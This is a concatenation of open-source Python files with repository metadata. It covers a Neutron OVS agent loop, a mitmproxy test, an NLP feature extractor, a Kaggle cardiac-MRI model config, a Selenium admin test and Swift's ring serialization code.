elif status == constants.OVS_DEAD:
LOG.warn(_LW("OVS is dead. OVSNeutronAgent will keep running "
"and checking OVS status periodically."))
return status
def loop_count_and_wait(self, start_time, port_stats):
# sleep till end of polling interval
elapsed = time.time() - start_time
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d "
"completed. Processed ports statistics: "
"%(port_stats)s. Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'port_stats': port_stats,
'elapsed': elapsed})
if elapsed < self.polling_interval:
time.sleep(self.polling_interval - elapsed)
else:
LOG.debug("Loop iteration exceeded interval "
"(%(polling_interval)s vs. %(elapsed)s)!",
{'polling_interval': self.polling_interval,
'elapsed': elapsed})
self.iter_num = self.iter_num + 1
def get_port_stats(self, port_info, ancillary_port_info):
port_stats = {
'regular': {
'added': len(port_info.get('added', [])),
'updated': len(port_info.get('updated', [])),
'removed': len(port_info.get('removed', []))}}
if self.ancillary_brs:
port_stats['ancillary'] = {
'added': len(ancillary_port_info.get('added', [])),
'removed': len(ancillary_port_info.get('removed', []))}
return port_stats
def rpc_loop(self, polling_manager=None):
if not polling_manager:
polling_manager = polling.get_polling_manager(
minimize_polling=False)
sync = True
ports = set()
updated_ports_copy = set()
ancillary_ports = set()
tunnel_sync = True
ovs_restarted = False
while self._check_and_handle_signal():
start = time.time()
LOG.debug("Agent rpc_loop - iteration:%d started",
self.iter_num)
if sync:
LOG.info(_LI("Agent out of sync with plugin!"))
ports.clear()
ancillary_ports.clear()
sync = False
polling_manager.force_polling()
ovs_status = self.check_ovs_status()
if ovs_status == constants.OVS_RESTARTED:
self.setup_integration_br()
self.setup_physical_bridges(self.bridge_mappings)
if self.enable_tunneling:
self.reset_tunnel_br()
self.setup_tunnel_br()
tunnel_sync = True
if self.enable_distributed_routing:
self.dvr_agent.reset_ovs_parameters(self.int_br,
self.tun_br,
self.patch_int_ofport,
self.patch_tun_ofport)
self.dvr_agent.reset_dvr_parameters()
self.dvr_agent.setup_dvr_flows()
elif ovs_status == constants.OVS_DEAD:
# Agent doesn't apply any operations when ovs is dead, to
# prevent unexpected failure or crash. Sleep and continue
# loop in which ovs status will be checked periodically.
port_stats = self.get_port_stats({}, {})
self.loop_count_and_wait(start, port_stats)
continue
# Notify the plugin of tunnel IP
if self.enable_tunneling and tunnel_sync:
LOG.info(_LI("Agent tunnel out of sync with plugin!"))
try:
tunnel_sync = self.tunnel_sync()
except Exception:
LOG.exception(_LE("Error while synchronizing tunnels"))
tunnel_sync = True
ovs_restarted |= (ovs_status == constants.OVS_RESTARTED)
if self._agent_has_updates(polling_manager) or ovs_restarted:
try:
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d - "
"starting polling. Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# Save updated ports dict to perform rollback in
# case resync would be needed, and then clear
# self.updated_ports. As the greenthread should not yield
# between these two statements, this will be thread-safe
updated_ports_copy = self.updated_ports
self.updated_ports = set()
reg_ports = (set() if ovs_restarted else ports)
port_info = self.scan_ports(reg_ports, updated_ports_copy)
self.process_deleted_ports(port_info)
self.update_stale_ofport_rules()
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d - "
"port information retrieved. "
"Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# Treat ancillary devices if they exist
if self.ancillary_brs:
ancillary_port_info = self.scan_ancillary_ports(
ancillary_ports)
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d - "
"ancillary port info retrieved. "
"Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# Secure and wire/unwire VIFs and update their status
# on Neutron server
if (self._port_info_has_changes(port_info) or
self.sg_agent.firewall_refresh_needed() or
ovs_restarted):
LOG.debug("Starting to process devices in:%s",
port_info)
# If treat devices fails - must resync with plugin
sync = self.process_network_ports(port_info,
ovs_restarted)
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d - "
"ports processed. Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
ports = port_info['current']
if self.ancillary_brs:
sync |= self.process_ancillary_network_ports(
ancillary_port_info)
LOG.debug("Agent rpc_loop - iteration: "
"%(iter_num)d - ancillary ports "
"processed. Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
ancillary_ports = ancillary_port_info['current']
polling_manager.polling_completed()
# Keep this flag in the last line of "try" block,
# so we can sure that no other Exception occurred.
if not sync:
ovs_restarted = False
except Exception:
LOG.exception(_LE("Error while processing VIF ports"))
# Put the ports back in self.updated_port
self.updated_ports |= updated_ports_copy
sync = True
ancillary_port_info = (ancillary_port_info if self.ancillary_brs
else {})
port_stats = self.get_port_stats(port_info, ancillary_port_info)
self.loop_count_and_wait(start, port_stats)
def daemon_loop(self):
# Start everything.
LOG.info(_LI("Agent initialized successfully, now running... "))
signal.signal(signal.SIGTERM, self._handle_sigterm)
signal.signal(signal.SIGHUP, self._handle_sighup)
with polling.get_polling_manager(
self.minimize_polling,
self.ovsdb_monitor_respawn_interval) as pm:
self.rpc_loop(polling_manager=pm)
def _handle_sigterm(self, signum, frame):
self.catch_sigterm = True
if self.quitting_rpc_timeout:
self.set_rpc_timeout(self.quitting_rpc_timeout)
def _handle_sighup(self, signum, frame):
self.catch_sighup = True
def _check_and_handle_signal(self):
if self.catch_sigterm:
LOG.info(_LI("Agent caught SIGTERM, quitting daemon loop."))
self.run_daemon_loop = False
self.catch_sigterm = False
if self.catch_sighup:
LOG.info(_LI("Agent caught SIGHUP, resetting."))
self.conf.reload_config_files()
config.setup_logging()
LOG.debug('Full set of CONF:')
self.conf.log_opt_values(LOG, std_logging.DEBUG)
self.catch_sighup = False
return self.run_daemon_loop
def set_rpc_timeout(self, timeout):
for rpc_api in (self.plugin_rpc, self.sg_plugin_rpc,
self.dvr_plugin_rpc, self.state_rpc):
rpc_api.client.timeout = timeout
def _check_agent_configurations(self):
if (self.enable_distributed_routing and self.enable_tunneling
and not self.l2_pop):
raise ValueError(_("DVR deployments for VXLAN/GRE underlays "
"require L2-pop to be enabled, in both the "
"Agent and Server side."))
def create_agent_config_map(config):
"""Create a map of agent config parameters.
:param config: an instance of cfg.CONF
:returns: a map of agent configuration parameters
"""
try:
bridge_mappings = n_utils.parse_mappings(config.OVS.bridge_mappings)
except ValueError as e:
raise ValueError(_("Parsing bridge_mappings failed: %s.") % e)
kwargs = dict(
integ_br=config.OVS.integration_bridge,
tun_br=config.OVS.tunnel_bridge,
local_ip=config.OVS.local_ip,
bridge_mappings=bridge_mappings,
polling_interval=config.AGENT.polling_interval,
minimize_polling=config.AGENT.minimize_polling,
tunnel_types=config.AGENT.tunnel_types,
veth_mtu=config.AGENT.veth_mtu,
enable_distributed_routing=config.AGENT.enable_distributed_routing,
l2_population=config.AGENT.l2_population,
arp_responder=config.AGENT.arp_responder,
prevent_arp_spoofing=config.AGENT.prevent_arp_spoofing,
use_veth_interconnection=config.OVS.use_veth_interconnection,
quitting_rpc_timeout=config.AGENT.quitting_rpc_timeout
)
# Verify the tunnel_types specified are valid
for tun in kwargs['tunnel_types']:
if tun not in constants.TUNNEL_NETWORK_TYPES:
msg = _('Invalid tunnel type specified: %s'), tun
raise ValueError(msg)
if not kwargs['local_ip']:
msg = _('Tunneling cannot be enabled without a valid local_ip.')
raise ValueError(msg)
return kwargs
def prepare_xen_compute():
is_xen_compute_host = 'rootwrap-xen-dom0' in cfg.CONF.AGENT.root_helper
if is_xen_compute_host:
# Force ip_lib to always use the root helper to ensure that ip
# commands target xen dom0 rather than domU.
cfg.CONF.register_opts(ip_lib.OPTS)
cfg.CONF.set_default('ip_lib_force_root', True)
def main(bridge_classes):
try:
agent_config = create_agent_config_map(cfg.CONF)
except ValueError:
LOG.exception(_LE("Agent failed to create agent config map"))
raise SystemExit(1)
prepare_xen_compute()
try:
agent = OVSNeutronAgent(bridge_classes, **agent_config)
except (RuntimeError, ValueError) as e:
LOG.error(_LE("%s Agent terminated!"), e)
sys.exit(1)
agent.daemon_loop()
| paninetworks/neutron | neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py | Python | apache-2.0 | 80,312 |
import io
import subprocess
from unittest import mock
from mitmproxy.utils import debug
def test_dump_system_info():
assert debug.dump_system_info()
with mock.patch('subprocess.check_output') as m:
m.side_effect = subprocess.CalledProcessError(-1, 'git describe --tags --long')
assert 'release version' in debug.dump_system_info()
def test_dump_info():
cs = io.StringIO()
debug.dump_info(None, None, file=cs, testing=True)
assert cs.getvalue()
def test_dump_stacks():
cs = io.StringIO()
debug.dump_stacks(None, None, file=cs, testing=True)
assert cs.getvalue()
def test_register_info_dumpers():
debug.register_info_dumpers()
| dwfreed/mitmproxy | test/mitmproxy/utils/test_debug.py | Python | mit | 687 |
from abstract_feature import AbstractFeature
from token_feature import HeadFeature, get_lemma
class DependencyFeature(AbstractFeature):
accepted_deps=[ "nn", "agent", "dobj", "nsubj", "amod", "nsubjpass", "poss", "appos"]
"""
Universal Dependencies
"""
def apply(self, sentence, mention, features):
# head_index = HeadFeature.get_head(sentence, mention)
# for dep_type, gov, dep in sentence.dep:
# if head_index == gov:
# token = 'root'
# if dep >= 0:
# token = get_lemma(sentence.tokens[dep], sentence.pos[dep])
# features.append('ROLE_gov:%s' % dep_type)
# features.append('PARENT_%s' % token)
# if head_index == dep:
# token = 'root'
# if gov >= 0:
# token = get_lemma(sentence.tokens[dep], sentence.pos[gov])
# features.append('ROLE_dep:%s' % dep_type)
# features.append('PARENT_%s' % token)
start = mention.start
end = mention.end
for dep_type, gov, dep in sentence.dep:
if start <= gov < end:
if 0 <= dep <sentence.size():
token = get_lemma(sentence.tokens[dep], sentence.pos[dep])
pos = sentence.pos[dep]
if self.accept_pos(pos) and self.accept_dep(dep_type):
key = "gov:" + dep_type + ":" + token + "=" + pos[0]
features.append(("DEP_" + key))
if start <= dep < end:
if 0 <= gov < sentence.size():
token = get_lemma(sentence.tokens[gov], sentence.pos[gov])
pos = sentence.pos[gov]
if self.accept_pos(pos) and self.accept_dep(dep_type):
key = "dep:" + dep_type + ":" + token + "=" + pos[0]
features.append(("DEP_" + key))
def accept_pos(self, pos):
return pos[0] == 'N' or pos[0] == 'V'
def accept_dep(self, dep):
return dep.startswith('prep') or dep in self.accepted_deps
| shanzhenren/AFET | DataProcessor/Feature/dependency_feature.py | Python | gpl-3.0 | 2,135 |
"""Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
# Random params
rng = np.random
take_a_dump = False # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False # dump the outputs from the dataloader (for debugging)
# Memory usage scheme
caching = None
# Save and validation frequency
validate_every = 20
validate_train_set = True
save_every = 20
restart_from_save = False
dump_network_loaded_data = False
# Training (schedule) parameters
# - batch sizes
batch_size = 8
sunny_batch_size = 4
batches_per_chunk = 8
num_epochs_train = 400
# - learning rate and method
base_lr = 0.01
learning_rate_schedule = {
0: base_lr,
9*num_epochs_train/10: base_lr/10,
19*num_epochs_train/20: base_lr/100,
}
momentum = 0.9
build_updates = updates.build_adam_updates
# Preprocessing stuff
cleaning_processes = [
preprocess.set_upside_up,]
cleaning_processes_post = [
functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
augmentation_params = {
"rotation": (-360, 360),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
}
patch_mm = 64
use_hough_roi = True
preprocess_train = functools.partial( # normscale_resize_and_augment has a bug
preprocess.preprocess_normscale,
normscale_resize_and_augment_function=functools.partial(
image_transform.normscale_resize_and_augment_2,
normalised_patch_size=(patch_mm, patch_mm)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
# Data generators
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
def filter_samples(folders):
# don't use patients who don't have more than 6 slices
return [
folder for folder in folders
if data_loader.compute_nr_slices(folder) > 6]
# Input sizes
patch_px = 32
nr_slices = 22
data_sizes = {
"sliced:data:sax": (batch_size, nr_slices, 30, patch_px, patch_px),
"sliced:data:sax:locations": (batch_size, nr_slices),
"sliced:data:sax:is_not_padded": (batch_size, nr_slices),
"sliced:data:randomslices": (batch_size, nr_slices, 30, patch_px, patch_px),
"sliced:data:singleslice:difference:middle": (batch_size, 29, patch_px, patch_px),
"sliced:data:singleslice:difference": (batch_size, 29, patch_px, patch_px),
"sliced:data:singleslice": (batch_size, 30, patch_px, patch_px),
"sliced:data:ax": (batch_size, 30, 15, patch_px, patch_px),
"sliced:data:shape": (batch_size, 2,),
"sunny": (sunny_batch_size, 1, patch_px, patch_px)
# TBC with the metadata
}
# Objective
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
# l2 regu on certain layers
l2_penalty = nn.regularization.regularize_layer_params_weighted(
interface_layers["regularizable"], nn.regularization.l2)
# build objective
return objectives.KaggleObjective(interface_layers["outputs"], penalty=l2_penalty)
# Testing
postprocess = postprocess.postprocess
test_time_augmentations = 100 # More augmentations since a we only use single slices
tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
# nonlinearity putting a lower bound on it's output
def lb_softplus(lb):
return lambda x: nn.nonlinearities.softplus(x) + lb
init = nn.init.Orthogonal()
rnn_layer = functools.partial(nn.layers.RecurrentLayer,
W_in_to_hid=init,
W_hid_to_hid=init,
b=nn.init.Constant(0.1),
nonlinearity=nn.nonlinearities.rectify,
hid_init=nn.init.Constant(0.),
backwards=False,
learn_init=True,
gradient_steps=-1,
grad_clipping=False,
unroll_scan=False,
precompute_input=False)
# Architecture
def build_model():
#################
# Regular model #
#################
input_size = data_sizes["sliced:data:sax"]
input_size_mask = data_sizes["sliced:data:sax:is_not_padded"]
input_size_locations = data_sizes["sliced:data:sax:locations"]
l0 = nn.layers.InputLayer(input_size)
lin_slice_mask = nn.layers.InputLayer(input_size_mask)
lin_slice_locations = nn.layers.InputLayer(input_size_locations)
# PREPROCESS SLICES SEPERATELY
l0_slices = nn.layers.ReshapeLayer(l0, (batch_size * nr_slices, 30, patch_px, patch_px)) # (bxs, t, i, j)
subsample_factor = 2
l0_slices_subsampled = nn.layers.SliceLayer(l0_slices, axis=1, indices=slice(0, 30, subsample_factor))
nr_frames_subsampled = 30 / subsample_factor
# PREPROCESS FRAMES SEPERATELY
l0_frames = nn.layers.ReshapeLayer(l0_slices_subsampled, (batch_size * nr_slices * nr_frames_subsampled, 1, patch_px, patch_px)) # (bxsxt, 1, i, j)
# downsample
downsample = lambda incoming: nn.layers.dnn.Pool2DDNNLayer(incoming, pool_size=(2,2), stride=(2,2), mode='average_inc_pad')
upsample = lambda incoming: nn.layers.Upscale2DLayer(incoming, scale_factor=2)
l0_frames_d0 = l0_frames
l0_frames_d1 = downsample(l0_frames_d0)
l0_frames_d2 = downsample(l0_frames_d1)
l0_frames_d3 = downsample(l0_frames_d2)
ld3a = nn.layers.dnn.Conv2DDNNLayer(l0_frames_d3, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3b = nn.layers.dnn.Conv2DDNNLayer(ld3a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3c = nn.layers.dnn.Conv2DDNNLayer(ld3b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3o = nn.layers.dnn.Conv2DDNNLayer(ld3c, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2i = nn.layers.ConcatLayer([l0_frames_d2, upsample(ld3o)], axis=1)
ld2a = nn.layers.dnn.Conv2DDNNLayer(ld2i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2b = nn.layers.dnn.Conv2DDNNLayer(ld2a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2c = nn.layers.dnn.Conv2DDNNLayer(ld2b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2d = nn.layers.dnn.Conv2DDNNLayer(ld2c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2o = nn.layers.dnn.Conv2DDNNLayer(ld2d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1i = nn.layers.ConcatLayer([l0_frames_d1, upsample(ld2o)], axis=1)
ld1a = nn.layers.dnn.Conv2DDNNLayer(ld1i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1b = nn.layers.dnn.Conv2DDNNLayer(ld1a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1c = nn.layers.dnn.Conv2DDNNLayer(ld1b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1d = nn.layers.dnn.Conv2DDNNLayer(ld1c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1o = nn.layers.dnn.Conv2DDNNLayer(ld1d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0i = nn.layers.ConcatLayer([l0_frames_d0, upsample(ld1o)], axis=1)
ld0a = nn.layers.dnn.Conv2DDNNLayer(ld0i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0b = nn.layers.dnn.Conv2DDNNLayer(ld0a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0c = nn.layers.dnn.Conv2DDNNLayer(ld0b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0d = nn.layers.dnn.Conv2DDNNLayer(ld0c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0o = nn.layers.dnn.Conv2DDNNLayer(ld0d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=1, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.sigmoid)
ld0r = nn.layers.ReshapeLayer(ld0o, (batch_size * nr_slices * nr_frames_subsampled, patch_px, patch_px))
l_frames_musigma = layers.IntegrateAreaLayer(ld0r, sigma_mode='scale', sigma_scale=.1)
area_per_pixel_cm = (float(patch_mm) / float(patch_px))**2 / 100.0
l_frames_musigma_cm = layers.TrainableScaleLayer(l_frames_musigma, scale=nn.init.Constant(area_per_pixel_cm), trainable=False)
# Go back to a per slice model
l_slices_musigma_cm = nn.layers.ReshapeLayer(l_frames_musigma_cm, (batch_size * nr_slices, nr_frames_subsampled, 2)) # (bxs, t, 2)
l_slices_musigma_cm_sys = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='min') # (bxs, 2)
l_slices_musigma_cm_dia = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='max') # (bxs, 2)
l_slices_musigma_cm_avg = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='mean')
# AGGREGATE SLICES PER PATIENT
l_scaled_slice_locations = layers.TrainableScaleLayer(lin_slice_locations, scale=nn.init.Constant(0.1), trainable=False)
# Systole
l_pat_sys_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_sys, (batch_size, nr_slices, 2))
l_pat_sys_ss_mu_cm = nn.layers.SliceLayer(l_pat_sys_ss_musigma_cm, indices=0, axis=-1)
l_pat_sys_ss_sigma_cm = nn.layers.SliceLayer(l_pat_sys_ss_musigma_cm, indices=1, axis=-1)
l_pat_sys_aggr_mu_sigma = layers.JeroenLayer([l_pat_sys_ss_mu_cm, l_pat_sys_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_systole = layers.MuSigmaErfLayer(l_pat_sys_aggr_mu_sigma)
# Diastole
l_pat_dia_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_dia, (batch_size, nr_slices, 2))
l_pat_dia_ss_mu_cm = nn.layers.SliceLayer(l_pat_dia_ss_musigma_cm, indices=0, axis=-1)
l_pat_dia_ss_sigma_cm = nn.layers.SliceLayer(l_pat_dia_ss_musigma_cm, indices=1, axis=-1)
l_pat_dia_aggr_mu_sigma = layers.JeroenLayer([l_pat_dia_ss_mu_cm, l_pat_dia_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_diastole = layers.MuSigmaErfLayer(l_pat_dia_aggr_mu_sigma)
# Average
l_pat_avg_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_avg, (batch_size, nr_slices, 2))
l_pat_avg_ss_mu_cm = nn.layers.SliceLayer(l_pat_avg_ss_musigma_cm, indices=0, axis=-1)
l_pat_avg_ss_sigma_cm = nn.layers.SliceLayer(l_pat_avg_ss_musigma_cm, indices=1, axis=-1)
l_pat_avg_aggr_mu_sigma = layers.JeroenLayer([l_pat_avg_ss_mu_cm, l_pat_avg_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_mean = layers.MuSigmaErfLayer(l_pat_avg_aggr_mu_sigma)
return {
"inputs":{
"sliced:data:sax": l0,
"sliced:data:sax:is_not_padded": lin_slice_mask,
"sliced:data:sax:locations": lin_slice_locations,
},
"outputs": {
"systole": l_systole,
"diastole": l_diastole,
"average": l_mean,
},
"regularizable": {
},
}
| 317070/kaggle-heart | configurations/je_os_segmentandintegrate_noreg.py | Python | mit | 12,455 |
import random
import pytest
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
@pytest.fixture
def driver(request):
driver = webdriver.Chrome()
driver.implicitly_wait(2)
request.addfinalizer(driver.quit)
return driver
def test_external_links(driver):
wait = WebDriverWait(driver, 5)
driver.get("http://localhost/litecart/admin")
driver.find_element_by_name("username").send_keys("admin")
driver.find_element_by_name("password").send_keys("admin")
driver.find_element_by_name("login").click()
wait.until(EC.title_is("My Store"))
menu = driver.find_element_by_id("box-apps-menu")
menu.find_element(By.LINK_TEXT, "Countries").click()
wait.until(EC.title_contains("Countries"))
table = driver.find_element(By.CSS_SELECTOR, "table.dataTable")
rows = table.find_elements(By.CSS_SELECTOR, ".row")
countries = [row.find_element(By.TAG_NAME, 'a').text for row in rows]
country = random.randrange(0,(len(countries)))
driver.find_element(By.LINK_TEXT, countries[country]).click()
external_links = driver.find_elements(By.CLASS_NAME, "fa-external-link")
old_window = driver.current_window_handle
new_window = None
for external_link in external_links:
external_link.click()
wait.until(EC.new_window_is_opened)
current_windows = driver.window_handles
for window_id in current_windows:
if window_id != old_window:
new_window = window_id
driver.switch_to_window(new_window)
driver.close()
driver.switch_to_window(old_window) | dmchu/selenium_gr_5 | tests/day_8/hw_day_8_task_14.py | Python | apache-2.0 | 1,741 |
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import array
import six.moves.cPickle as pickle
import inspect
from collections import defaultdict
from gzip import GzipFile
from os.path import getmtime
import struct
from time import time
import os
from io import BufferedReader
from hashlib import md5
from itertools import chain
from tempfile import NamedTemporaryFile
from six.moves import range
from swift.common.utils import hash_path, validate_configuration, json
from swift.common.ring.utils import tiers_for_dev
class RingData(object):
"""Partitioned consistent hashing ring data (used for serialization)."""
def __init__(self, replica2part2dev_id, devs, part_shift):
self.devs = devs
self._replica2part2dev_id = replica2part2dev_id
self._part_shift = part_shift
for dev in self.devs:
if dev is not None:
dev.setdefault("region", 1)
@classmethod
def deserialize_v1(cls, gz_file, metadata_only=False):
"""
Deserialize a v1 ring file into a dictionary with `devs`, `part_shift`,
and `replica2part2dev_id` keys.
If the optional kwarg `metadata_only` is True, then the
`replica2part2dev_id` is not loaded and that key in the returned
dictionary just has the value `[]`.
:param file gz_file: An opened file-like object which has already
consumed the 6 bytes of magic and version.
:param bool metadata_only: If True, only load `devs` and `part_shift`
:returns: A dict containing `devs`, `part_shift`, and
`replica2part2dev_id`
"""
json_len, = struct.unpack('!I', gz_file.read(4))
ring_dict = json.loads(gz_file.read(json_len))
ring_dict['replica2part2dev_id'] = []
if metadata_only:
return ring_dict
partition_count = 1 << (32 - ring_dict['part_shift'])
for x in range(ring_dict['replica_count']):
ring_dict['replica2part2dev_id'].append(
array.array('H', gz_file.read(2 * partition_count)))
return ring_dict
@classmethod
def load(cls, filename, metadata_only=False):
"""
Load ring data from a file.
:param filename: Path to a file serialized by the save() method.
:param bool metadata_only: If True, only load `devs` and `part_shift`.
:returns: A RingData instance containing the loaded data.
"""
gz_file = GzipFile(filename, 'rb')
# Python 2.6 GzipFile doesn't support BufferedIO
if hasattr(gz_file, '_checkReadable'):
gz_file = BufferedReader(gz_file)
# See if the file is in the new format
magic = gz_file.read(4)
if magic == 'R1NG':
format_version, = struct.unpack('!H', gz_file.read(2))
if format_version == 1:
ring_data = cls.deserialize_v1(
gz_file, metadata_only=metadata_only)
else:
raise Exception('Unknown ring format version %d' %
format_version)
else:
# Assume old-style pickled ring
gz_file.seek(0)
ring_data = pickle.load(gz_file)
if not hasattr(ring_data, 'devs'):
ring_data = RingData(ring_data['replica2part2dev_id'],
ring_data['devs'], ring_data['part_shift'])
return ring_data
def serialize_v1(self, file_obj):
# Write out new-style serialization magic and version:
file_obj.write(struct.pack('!4sH', 'R1NG', 1))
ring = self.to_dict()
json_encoder = json.JSONEncoder(sort_keys=True)
json_text = json_encoder.encode(
{'devs': ring['devs'], 'part_shift': ring['part_shift'],
'replica_count': len(ring['replica2part2dev_id'])})
json_len = len(json_text)
file_obj.write(struct.pack('!I', json_len))
file_obj.write(json_text)
for part2dev_id in ring['replica2part2dev_id']:
file_obj.write(part2dev_id.tostring())
def save(self, filename, mtime=1300507380.0):
"""
Serialize this RingData instance to disk.
:param filename: File into which this instance should be serialized.
:param mtime: time used to override mtime for gzip, default or None
if the caller wants to include time
"""
# Override the timestamp so that the same ring data creates
# the same bytes on disk. This makes a checksum comparison a
# good way to see if two rings are identical.
#
# This only works on Python 2.7; on 2.6, we always get the
# current time in the gzip output.
tempf = NamedTemporaryFile(dir=".", prefix=filename, delete=False)
if 'mtime' in inspect.getargspec(GzipFile.__init__).args:
gz_file = GzipFile(filename, mode='wb', fileobj=tempf,
mtime=mtime)
else:
gz_file = GzipFile(filename, mode='wb', fileobj=tempf)
self.serialize_v1(gz_file)
gz_file.close()
tempf.flush()
os.fsync(tempf.fileno())
tempf.close()
os.chmod(tempf.name, 0o644)
os.rename(tempf.name, filename)
def to_dict(self):
return {'devs': self.devs,
'replica2part2dev_id': self._replica2part2dev_id,
'part_shift': self._part_shift}
class Ring(object):
"""
Partitioned consistent hashing ring.
:param serialized_path: path to serialized RingData instance
:param reload_time: time interval in seconds to check for a ring change
"""
def __init__(self, serialized_path, reload_time=15, ring_name=None):
# can't use the ring unless HASH_PATH_SUFFIX is set
validate_configuration()
if ring_name:
self.serialized_path = os.path.join(serialized_path,
ring_name + '.ring.gz')
else:
self.serialized_path = os.path.join(serialized_path)
self.reload_time = reload_time
self._reload(force=True)
def _reload(self, force=False):
self._rtime = time() + self.reload_time
if force or self.has_changed():
ring_data = RingData.load(self.serialized_path)
self._mtime = getmtime(self.serialized_path)
self._devs = ring_data.devs
# NOTE(akscram): Replication parameters like replication_ip
# and replication_port are required for
# replication process. An old replication
# ring doesn't contain this parameters into
# device. Old-style pickled rings won't have
# region information.
for dev in self._devs:
if dev:
dev.setdefault('region', 1)
if 'ip' in dev:
dev.setdefault('replication_ip', dev['ip'])
if 'port' in dev:
dev.setdefault('replication_port', dev['port'])
self._replica2part2dev_id = ring_data._replica2part2dev_id
self._part_shift = ring_data._part_shift
self._rebuild_tier_data()
# Do this now, when we know the data has changed, rather than
# doing it on every call to get_more_nodes().
regions = set()
zones = set()
ips = set()
self._num_devs = 0
for dev in self._devs:
if dev:
regions.add(dev['region'])
